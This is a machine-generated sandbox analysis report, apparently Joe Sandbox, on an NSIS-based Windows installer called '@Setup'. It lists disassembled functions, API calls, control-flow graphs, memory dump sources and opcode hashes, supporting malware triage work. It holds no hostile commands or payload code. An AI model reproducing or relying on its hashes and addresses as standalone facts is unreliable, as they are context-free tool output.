                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                    • API String ID: 4283519449-527102705
                                                                                                                                                    • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                    • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                    • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                    • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 780 404f9e-404fb1 781 404fb7-404fca 780->781 782 40506e-405070 780->782 783 404fd5-404fe1 lstrlenW 781->783 784 404fcc-404fd0 call 406831 781->784 786 404fe3-404ff3 lstrlenW 783->786 787 404ffe-405002 783->787 784->783 788 404ff5-404ff9 lstrcatW 786->788 789 40506c-40506d 786->789 790 405011-405015 787->790 791 405004-40500b SetWindowTextW 787->791 788->787 789->782 792 405017-405059 SendMessageW * 3 790->792 793 40505b-40505d 790->793 791->790 792->793 793->789 794 40505f-405064 793->794 794->789
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2740478559-0
                                                                                                                                                    • Opcode ID: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                                                                                                                    • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                    • Opcode Fuzzy Hash: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                                                                                                                    • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 795 402713-40273b call 406035 * 2 800 402746-402749 795->800 801 40273d-402743 call 40145c 795->801 803 402755-402758 800->803 804 40274b-402752 call 40145c 800->804 801->800 807 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 803->807 808 40275a-402761 call 40145c 803->808 804->803 808->807
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                    • String ID: <RM>$RaFill$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                    • API String ID: 247603264-434146042
                                                                                                                                                    • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                    • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                    • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                    • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 816 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 827 402223-4030f2 call 4062cf 816->827 828 40220d-40221b call 4062cf 816->828 828->827
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                    • API String ID: 3156913733-2180253247
                                                                                                                                                    • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                    • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                    • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                    • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 836 405eab-405eb7 837 405eb8-405eec GetTickCount GetTempFileNameW 836->837 838 405efb-405efd 837->838 839 405eee-405ef0 837->839 841 405ef5-405ef8 838->841 839->837 840 405ef2 839->840 840->841
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                    • String ID: nsa
                                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                                    • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                    • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                    • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                    • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 842 402175-40218b call 401446 * 2 847 402198-40219d 842->847 848 40218d-402197 call 4062cf 842->848 849 4021aa-4021b0 EnableWindow 847->849 850 40219f-4021a5 ShowWindow 847->850 848->847 852 4030e3-4030f2 849->852 850->852
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                    • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                    • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                    APIs
                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                    • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                    • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                    • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
